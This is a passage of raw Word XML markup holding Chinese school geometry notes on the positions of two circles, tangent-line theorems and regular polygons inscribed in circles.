          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>R+r</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>②</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>两圆外切</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> d=R+r  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>③</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>两圆相交</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> R-r</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>R+r(R</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">r)  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>④</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>两圆内切</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> d=R-r(R</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>r) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>⑤</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>两圆内含</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>R-r(R</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">r)  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>31</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、切线的判定与性质定理：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>切线的判定定理</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥" w:hint="eastAsia"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥" w:hint="eastAsia"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>经过半径的外端并且垂直于这条半径的直线是圆的切线</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>切线的性质定理</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥" w:hint="eastAsia"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥" w:hint="eastAsia"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>圆的切线垂直于经过切点的半径</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>推论</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥" w:hint="eastAsia"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>经过圆心且垂直于切线的直线必经过切点</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>推论</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥" w:hint="eastAsia"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥" w:hint="eastAsia"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>经过切点且垂直于切线的直线必经过圆心</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>切线长定理</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥" w:hint="eastAsia"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥" w:hint="eastAsia"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>从圆外一点引圆的两条切线，它们的切线长相等，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥" w:hint="eastAsia"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>圆心和这一点的连线平分两条切线的夹角</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥" w:hint="eastAsia"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>32.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥" w:hint="eastAsia"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>正多边形与圆</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥" w:hint="eastAsia"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>正多边形定义：各边相等，各角相等的多边形叫正多边形</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
          <w:color w:val="993300"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>正</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>边形的每个内角都等于（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>n-2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>×180°</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>／</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">n  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>定理</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>正</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>边形的半径和边心距把正</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>边形分成</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>2n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>个全等的直角三角形</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥" w:hint="eastAsia"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>定理</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>把圆分成</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>n(n≥3)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥" w:hint="eastAsia"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>等分点</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">:  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>依次连结各分点所得的多边形是这个圆的内接正</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>边形</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="ˎ̥" w:hAnsi="ˎ̥"/>
          <w:color w:val="993300"/>
          <w:szCs w:val="21"/>
        </w:rPr>
